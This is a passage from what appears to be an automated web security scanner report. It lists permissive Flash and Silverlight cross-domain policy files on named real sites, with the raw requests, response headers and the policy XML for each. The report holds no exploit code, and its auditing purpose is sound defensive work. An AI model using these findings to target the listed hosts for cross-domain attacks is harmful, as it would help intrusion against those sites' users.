Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:45 GMT; path=/

<cross-domain-policy>
<allow-access-from domain="*.ai-media.com" />
<allow-access-from domain="*.marykay.com" />
</cross-domain-policy>

4.121. http://www.msnbc.msn.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.msnbc.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: www.msnbc.msn.com
Proxy-Connection: keep-alive
Referer: http://quote.cnbc.com/quoteproxy.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __qca=P0-1162228222-1314847229546; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; Sample=3; TOptOut=1; MUID=9FA60E9E25934DD3BB2BBC07F1AAFA23

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 31 May 2011 22:37:42 GMT
Accept-Ranges: bytes
ETag: "0ff4d5ae31fcc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 3839
Cache-Control: max-age=86
Expires: Tue, 06 Sep 2011 15:07:00 GMT
Date: Tue, 06 Sep 2011 15:05:34 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=0; path=/; domain=.msnbc.msn.com

<?xml version="1.0"?>
<!-- http://www.msnbc.com/crossdomain.xml -->
<cross-domain-policy>
   <allow-access-from domain="nbcsports.com" />
   <allow-access-from domain="nbcsports.msnbc.com" />
   <allow-access-from domain="*.nbcsports.com" />
   <allow-access-from domain="*.nbcsports.msnbc.com" />
   <allow-access-from domain="*.msnbc.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msnbc.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbciweb" />
   <allow-access-from domain="*.ivillage.com " />
   <allow-access-from domain="i.ivillage.com" />
   <allow-access-from domain="devi.ivillage.com" />
   <allow-access-from domain="*.nbcuni.com " />
   <allow-access-from domain="*.newsweek.com"/>
   <allow-access-from domain="*.washingtonpost.com"/>
   <allow-access-from domain="*.brightcove.com"/>
   <allow-access-from domain="*.feedburner.com"/>
   <allow-access-from domain="msnbc-xpress" />
   <allow-access-from domain="www.cnbc.com"/>
   <allow-access-from domain="*.cnbc.com"/>
   <allow-access-from domain="widgets.nbcuni.com"/>
   <allow-access-from domain="*.thenbcagency.com"/>
   <allow-access-from domain="*.veoh.com"/>
   <allow-access-from domain="*.imeem.com"/>
   <allow-access-from domain="*.livejournal.com"/>
   <allow-access-from domain="*.vox.com"/>
   <allow-access-from domain="*.sixapart.com"/>
   <allow-access-from domain="*.reuters.com"/>
   <allow-access-from domain="*.real.com"/>
   <allow-access-from domain="*.akamai.net"/>
   <allow-access-from domain="*.atlasrichmedia.co.au"/>
   <allow-access-from domain="*.atlasrichmedia.co.uk"/>
   <allow-access-from domain="*.atlasrichmedia.com"/>
   <allow-access-from domain="*.atdmt.com"/>
   <allow-access-from domain="*.eyeblasterwiz.com"/>
   <allow-access-from domain="*.serving-sys.com"/>
   <allow-access-from domain="*.Abc.com"/>
   <allow-access-from domain="*.Abcnews.com"/>
   <allow-access-from domain="*.Accuweather.com"/>
   <allow-access-from domain="*.Cbs.com"/>
   <allow-access-from domain="*.cbsnews.com"/>
   <allow-access-from domain="*.discovery.com"/>
   <allow-access-from domain="*.ew.com"/>
   <allow-access-from domain="*.fox.com"/>
   <allow-access-from domain="*.foxnews.com"/>
   <allow-access-from domain="*.ign.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.tvguide.com"/>
   <allow-access-from domain="*.weather.com"/>
   <allow-access-from domain="*.vh1.com"/>
   <allow-access-from domain="*.usatoday.com"/>
   <allow-access-from domain="*.bmg.com"/>
   <allow-access-from domain="*.bmgmusic.com"/>
   <allow-access-from domain="*.people.com"/>
   <allow-access-from domain="*.fluid.nl"/>
   <allow-access-from domain="*.myspace.com"/>
<allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.newsvine.com"/>
   <allow-access-from domain="*.stamen.com" />
   <allow-access-from domain="64.207.156.207"/>
   <allow-access-from domain="*.msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="msnbcmedia.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.s-msn.com" />
   <allow-access-from domain="*.telemundo.com" />
<allow-access-from domain="*.unicornmedia.com" />
<allow-access-from domain="*.pointroll.com" />
<allow-access-from domain="*.intellitxt.com"/>
<allow-access-from domain="*.panachetech.com"/>
<allow-access-from domain="*.interpolls.com"/>
<allow-access-from domain="*.unicornmedia.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornapp.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.unicornmediabeta.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="today.com" />
<allow-access-from domain="*.today.com" />
<allow-access-from domain="*.pointroll.net" />
<allow-access-from domain="*.imwx.com" />
...[SNIP]...

4.122. http://www.oracle.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracle.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=309450997205923259,0)
Date: Tue, 06 Sep 2011 15:53:59 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
...[SNIP]...
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
<allow-access-from domain="www.oracleimg.com"/>
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.123. http://www.oracleimg.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.oracleimg.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 12 Apr 2011 22:21:08 GMT
ETag: "969d62-414-4a0c01bd5bd00"
Content-Type: application/xml
Content-Language: en
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.2.0 (G;max-age=300+0;age=0;ecid=194754870172961622,0)
Date: Tue, 06 Sep 2011 15:54:07 GMT
Content-Length: 1044
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.oracle.com"/>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
<allow-access-from domain="presenter.oracle.com"/>
<allow-access-from domain="streaming.oracle.com"/>
<allow-access-from domain="web148.oracle.com"/>
<allow-access-from domain="http://72.47.210.156"/>
<allow-access-from domain="http://216.70.88.224"/>
<allow-access-from domain="events-mktas.oracle.com"/>
<allow-access-from domain="events-mktap.oracle.com"/>
<allow-access-from domain="eventreg.oracle.com"/>
<allow-access-from domain="*.brightcove.com"/>
<allow-access-from domain="admin.brightcove.com"/>
...[SNIP]...
<allow-access-from domain="medianetwork.oracle.com"/>
<allow-access-from domain="*.akamai.com"/>
<allow-access-from domain="*.omniture.com"/>
...[SNIP]...

4.124. http://www.sapient.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.sapient.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.sapient.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=86400
Content-Length: 588
Content-Type: text/xml
Last-Modified: Thu, 23 Apr 2009 19:45:38 GMT
Accept-Ranges: bytes
ETag: "5321c4134cc4c91:27f4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:32:32 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"[]>
<cross-domain-policy>
<allow-access-from domain="*.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.sapientem.com" secure="false" />
...[SNIP]...
<allow-access-from domain="sapient.com.edgesuite.net" secure="false" />
...[SNIP]...
<allow-access-from domain="edge.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="edge-dev.sapient.com" secure="false" />
...[SNIP]...
<allow-access-from domain="localhost" secure="false" />
...[SNIP]...

4.125. http://www.youtube.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.youtube.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/x-cross-domain-policy
Last-Modified: Fri, 03 Jun 2011 20:25:01 GMT
Date: Tue, 06 Sep 2011 15:34:00 GMT
Expires: Tue, 06 Sep 2011 15:34:00 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
Server: sffe
X-XSS-Protection: 1; mode=block

<?xml version="1.0"?>
<!-- http://www.youtube.com/crossdomain.xml -->
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.youtube.com" />
<allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.126. http://www2.znode.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www2.znode.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www2.znode.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:09 GMT
Server: Apache
Last-Modified: Tue, 05 Apr 2011 16:22:18 GMT
ETag: "e5"
Accept-Ranges: bytes
Content-Length: 229
Cache-Control: max-age=63072000
Expires: Thu, 05 Sep 2013 15:32:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/xml
X-Pardot-LB: lb-s2
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.pardot.com" />
<allow-access-from domain="*.visual.force.com" />
<site-control permitted-cross-domain-policies="master-on
...[SNIP]...

4.127. http://1215.ic-live.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1215.ic-live.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:50 GMT
Server: Apache
Last-Modified: Thu, 17 Mar 2011 17:54:10 GMT
ETag: "1320541-1c8-49eb15936b480"
Accept-Ranges: bytes
Content-Length: 456
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/xml
X-Cache: MISS from i2a-coll-16
X-Cache-Lookup: MISS from i2a-coll-16:80
Via: 1.0 i2a-coll-16:80 (squid/2.6.STABLE21)
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master
...[SNIP]...
<allow-access-from domain="ecdev1.avery.com" secure="false" />
...[SNIP]...
<allow-access-from domain="ecdev1.averysignaturebinders.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.averysignaturebinders.com" secure="false" />
...[SNIP]...

4.128. http://admin5.testandtarget.omniture.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admin5.testandtarget.omniture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: admin5.testandtarget.omniture.com

Response

HTTP/1.1 200 OK
Server: Test & Target
Content-Type: application/xml
Date: Tue, 06 Sep 2011 17:05:50 GMT
Accept-Ranges: bytes
ETag: W/"313-1313024241000"
Connection: close
Set-Cookie: X-Mapping-obodhgke=640418F0570BDEEB38606A0E869DD5BA; path=/
Last-Modified: Thu, 11 Aug 2011 00:57:21 GMT
Content-Length: 313

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="s7sps1.scene7.com"/>
<allow-access-from domain="s7sps3.scene7.com"/>
<allow-access-from domain="s7sps5.scene7.com"/>
...[SNIP]...

4.129. http://api.twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://api.twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:11 GMT
Server: hi
Status: 200 OK
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Content-Type: application/xml
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:11 GMT
Vary: Accept-Encoding
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="twitter.com" />
...[SNIP]...
<allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.130. https://docs.google.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://docs.google.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains, and allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: docs.google.com

Response

HTTP/1.0 200 OK
Expires: Tue, 06 Sep 2011 22:44:04 GMT
Date: Mon, 05 Sep 2011 22:44:04 GMT
Content-Type: text/x-cross-domain-policy
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Cache-Control: public, max-age=86400
Age: 66149

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="video.google.com" /><allow-access-from domain="s.ytimg.com" />
...[SNIP]...

4.131. http://search.oracle.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://search.oracle.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: search.oracle.com

Response

HTTP/1.0 200 OK
ETag: "2916d-103-4d8251fe"
Content-Type: application/xml
Last-Modified: Thu, 17 Mar 2011 18:25:02 GMT
Server: Oracle-Application-Server-10g OracleAS-Web-Cache-10g/10.1.2.3.2 (G;max-age=0+0;age=0;ecid=118531604508,0)
Date: Tue, 06 Sep 2011 15:54:24 GMT
Content-Length: 259
Connection: close
Set-Cookie: BIGipServerses_ext_prod_pool=2131530381.30494.0000; expires=Wed, 07-Sep-2011 03:54:24 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="oracle.com"/>
<allow-access-from domain="www.oracle.com"/>
...[SNIP]...

4.132. http://sophelle.app5.hubspot.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sophelle.app5.hubspot.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: sophelle.app5.hubspot.com

Response

HTTP/1.1 200 OK
Content-Length: 206
Content-Type: text/xml
Last-Modified: Wed, 17 Oct 2007 22:47:20 GMT
Accept-Ranges: bytes
ETag: "04cb8acf11c81:111e7"
Server: Microsoft-IIS/6.0
P3P: policyref="http://www.hubspot.com/w3c/p3p.xml", CP="CURa ADMa DEVa TAIa PSAa PSDa OUR IND DSP NON COR"
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 15:27:54 GMT
Connection: close

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy (View Source for full doctype...)>
- <cross-domain-policy>
<allow-access-from domain="www.bluemedia.com" secure="true" />
</cross-domain-p
...[SNIP]...

4.133. http://sun.edgeboss.net/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://sun.edgeboss.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.1
Host: sun.edgeboss.net
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "7be11faf85a93e167b2214a018411ba6:1237306055"
Last-Modified: Tue, 17 Mar 2009 16:07:35 GMT
Accept-Ranges: bytes
Content-Length: 384
Content-Type: application/xml
Date: Tue, 06 Sep 2011 16:13:00 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="optimizeyourit.com" />
   <allow-access-from domain="optimiseyourit.com" />
   <allow-access-from domain="www.optimizeyourit.com" />
   <allow-access-from domain="www.optimiseyourit.com" />
...[SNIP]...

4.134. http://twitter.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://twitter.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific subdomains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: twitter.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:47 GMT
Server: Apache
Last-Modified: Mon, 29 Aug 2011 17:35:22 GMT
Accept-Ranges: bytes
Content-Length: 561
Cache-Control: max-age=1800
Expires: Tue, 06 Sep 2011 16:02:47 GMT
Vary: Accept-Encoding
X-XSS-Protection: 1; mode=block
Connection: close
Content-Type: application/xml

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<al
...[SNIP]...
<allow-access-from domain="api.twitter.com" />
   <allow-access-from domain="search.twitter.com" />
   <allow-access-from domain="static.twitter.com" />
...[SNIP]...

4.135. http://www.covergirl.com/crossdomain.xml  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.covergirl.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from specific other domains.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.covergirl.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 09 Aug 2011 12:19:16 GMT
Accept-Ranges: bytes
ETag: "03a528e8e56cc1:295a5"
Server: Microsoft-IIS/6.0
X-Server: EW58
X-Powered-By: ASP.NET
Date: Tue, 06 Sep 2011 16:45:26 GMT
Connection: close

<?xml version="1.0" ?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all" />
<allow-access-from domain="cgmakeover.appspot.com"/>
<allow-http-request-headers-from domain="
...[SNIP]...

5. Silverlight cross-domain policy  previous  next
There are 23 instances of this issue:

Issue background

The Silverlight cross-domain policy controls whether Silverlight client components running on other domains can perform two-way interaction with the domain which publishes the policy. If another domain is allowed by the policy, then that domain can potentially attack users of the application. If a user is logged in to the application, and visits a domain allowed by the policy, then any malicious content running on that domain can potentially gain full access to the application within the security context of the logged in user.

Even if an allowed domain is not overtly malicious in itself, security vulnerabilities within that domain could potentially be leveraged by a third-party attacker to exploit the trust relationship and attack the application which allows access.

Issue remediation

You should review the domains which are allowed by the Silverlight cross-domain policy and determine whether it is appropriate for the application to fully trust both the intentions and security posture of those domains.


5.1. http://ad.doubleclick.net/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/xml
Content-Length: 314
Last-Modified: Wed, 21 May 2008 20:54:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*"/>
</allow-from>
<grant-to>
<resource
...[SNIP]...

5.2. http://ads.pointroll.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads.pointroll.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 348
Content-Type: text/xml
Last-Modified: Wed, 01 Dec 2010 17:45:39 GMT
Accept-Ranges: bytes
ETag: "80a33917f91cb1:1718"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 06 Sep 2011 14:57:10 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="*">
<domain uri="http://*" />
</allow-from>

...[SNIP]...

5.3. http://ads1.msn.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ads1.msn.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: ads1.msn.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=31536000
Date: Tue, 06 Sep 2011 15:00:14 GMT
Content-Length: 348
Content-Type: text/xml
Last-Modified: Fri, 01 Apr 2011 20:58:23 GMT
Accept-Ranges: bytes
Server: Microsoft-IIS/6.0
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l comment "RSACi North America Server" by "inet@microsoft.com" r (n 0 s 0 v 0 l 0))
X-Powered-By: ASP.NET
Expires: Tue, 01 May 2012 16:29:02 GMT
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from http-request-headers="SOAPAction">
<domain uri="*"/>
</allow-from>

...[SNIP]...

5.4. http://b.scorecardresearch.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: b.scorecardresearch.com

Response

HTTP/1.0 200 OK
Last-Modified: Thu, 15 Oct 2009 22:41:14 GMT
Content-Type: application/xml
Expires: Wed, 07 Sep 2011 14:56:57 GMT
Date: Tue, 06 Sep 2011 14:56:57 GMT
Content-Length: 320
Connection: close
Cache-Control: private, no-transform, max-age=86400
Server: CS

<?xml version="1.0" encoding="utf-8" ?>
<access-policy>
<cross-domain-access>
<policy>
<allow-from>
<domain uri="*" />
</allow-from>
<grant-to>
<resou
...[SNIP]...

5.5. http://intelligence.marykay.com/clientaccesspolicy.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://intelligence.marykay.com
Path:   /clientaccesspolicy.xml

Issue detail

The application publishes a Silverlight cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /clientaccesspolicy.xml HTTP/1.0
Host: intelligence.marykay.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 16:45:51 GMT
Server: Omniture DC/2.0.0
xserver: www425
Connection: close
Content-Type: text/html

<access-policy>
   <cross-domain-access>
       <policy>
           <allow-from http-request-headers="*">
               <domain uri="*" />
           </allow-from>
           <grant-to>
               <resource path="/" include-subpaths="true" />
           </
...[SNIP]...

